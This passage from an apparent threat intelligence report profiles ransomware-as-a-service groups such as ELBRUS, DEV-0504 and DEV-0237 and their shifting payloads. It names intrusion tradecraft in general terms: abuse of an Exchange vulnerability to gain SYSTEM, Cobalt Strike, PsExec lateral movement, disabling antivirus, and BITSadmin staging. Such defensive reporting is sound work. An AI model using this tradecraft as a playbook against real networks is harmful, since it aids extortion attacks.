operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d part